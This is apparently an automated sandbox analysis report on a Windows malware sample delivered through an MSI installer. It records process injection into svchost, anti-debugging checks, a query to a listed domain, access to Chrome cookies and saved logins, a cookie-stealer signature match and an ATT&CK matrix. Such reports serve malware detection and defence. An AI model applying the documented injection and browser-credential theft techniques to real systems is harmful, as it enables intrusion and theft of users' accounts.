Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04D772D8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED669F IsDebuggerPresent,OutputDebugStringW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB804 GetLastError,IsDebuggerPresent,OutputDebugStringW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBB540 UnmapViewOfFile,CreateFileMappingW,MapViewOfFile,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC1D00 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDE94C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED5AE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED62AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D103EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FA9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789B324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789A9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1980296C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805788 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB3D8 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D3648 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D0824 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe | Domain query: toa.mygametoa.com
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24B7C9A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 204F32C0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23341FB0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D91A370000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2F2C5B40000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 222CAA60000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 286215B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DC519A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2216B180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2743A260000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1111A940000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22F12130000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BE5BFA0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21C22B30000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 202B2180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AFBA0B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25C96320000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,
Creates a thread in another existing process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F32C0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 41FB0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 1A370000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C5B40000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: CAA60000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 215B0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 519A0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6B180000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 3A260000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 1A940000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 12130000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 22B30000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: B2180000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BA0B0000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 96320000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: unknown EIP: 3F100000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: unknown EIP: 8E740000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread created: unknown EIP: CCE40000
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 204F32C0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 23341FB0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D91A370000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 2F2C5B40000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 222CAA60000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 286215B0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DC519A0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 2216B180000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 2743A260000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 1111A940000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F12130000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C22B30000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 202B2180000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AFBA0B0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\svchost.exe base: 25C96320000
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\svchost.exe | Thread register set: target process: 6944
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EBC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F339BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\svchost.exe | Thread register set: 6944 4D000
Source: C:\Windows\System32\svchost.exe | Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,FindCloseChangeNotification,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\System32\svchost.exe | Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\System32\svchost.exe | Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_006A4AF0 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_005C6A5C AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_005C78B8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: GetLocaleInfoW,
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00405AE0 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0041C3D8 GetLocalTime,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198DEC74 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_00625580 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,
Source: svchost.exe, 00000026.00000000.409083058.0000025C96554000.00000004.00000001.sdmp | Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information:

Yara detected Cookie Stealer
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\System32\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Yara detected Cookie Stealer
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ECD7B0 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED2030 socket,bind,closesocket,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED39E0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F0B90 htons,bind,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17896260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17898000 WSAGetLastError,socket,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17890B90 htons,bind,
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A0B90 htons,bind,
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Native API1 | DLL Side-Loading1 | Exploitation for Privilege Escalation1 | Disable or Modify Tools1 | OS Credential Dumping2 | System Time Discovery2 | Replication Through Removable Media1 | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Replication Through Removable Media1 | Service Execution12 | Create Account1 | DLL Side-Loading1 | Deobfuscate/Decode Files or Information1 | Input Capture11 | Peripheral Device Discovery11 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Valid Accounts1 | Valid Accounts1 | Obfuscated Files or Information21 | Credentials In Files1 | System Service Discovery1 | SMB/Windows Admin Shares | Input Capture11 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Windows Service11 | Access Token Manipulation11 | Software Packing21 | NTDS | File and Directory Discovery3 | Distributed Component Object Model | Clipboard Data2 | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Registry Run Keys / Startup Folder1 | Windows Service11 | DLL Side-Loading1 | LSA Secrets | System Information Discovery47 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Bootkit1 | Process Injection823 | File Deletion1 | Cached Domain Credentials | Query Registry1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder1 | Masquerading122 | DCSync | Security Software Discovery471 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts1 | Proc Filesystem | Virtualization/Sandbox Evasion131 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Modify Registry1 | /etc/passwd and /etc/shadow | Process Discovery3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Virtualization/Sandbox Evasion131 | Network Sniffing | Application Window Discovery11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Access Token Manipulation11 | Input Capture | System Owner/User Discovery2 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection823 | Keylogging | Remote System Discovery1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Bootkit1 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Rundll321 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | Internal Defacement
Hardware Additions | JavaScript/JScript | Valid Accounts | Dynamic-link Library Injection | Indicator Removal on Host1 | Credential API Hooking | System Information Discovery | Exploit Enterprise Resources | Remote Email Collection | Alternate Network Mediums | External Proxy | External Defacement
(Each tactic column is an independent list of differing length, so cells in the lower rows do not line up with the header columns; the digits following a technique name are the report's own count badges, kept as extracted.)

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 508222, Sample: 6rfyiAq0nM, Start date: 24/10/2021, Architecture: WINDOWS, Score: 74

  • Start (node 2): signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; 3 other signatures. Starts msiexec.exe (10) and msiexec.exe (14).
  • msiexec.exe (10): drops C:\Windows\Installer\MSIFBC3.tmp (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them. Starts MSIFBC3.tmp (16).
  • MSIFBC3.tmp (16): drops C:\Users\user\AppData\Local\...\MSIFBC3.tmp (PE32). Starts MSIFBC3.tmp (19).
  • MSIFBC3.tmp (19): drops C:\Program Files (x86)\...\is-VR0CA.tmp (PE32), C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+), C:\Users\user\AppData\Local\...\_isdecmp.dll (PE32) and 13 other files (none is malicious). Starts rundll32.exe (22).
  • rundll32.exe (22): signatures: Contains functionality to infect the boot sector; Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes; 5 other signatures. Injects into svchost.exe (25), svchost.exe (28), svchost.exe (30) and 14 other processes.
  • svchost.exe (25, injected): signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to infect the boot sector; Contains functionality to inject threads in other processes; 5 other signatures. Starts svchost.exe (34).
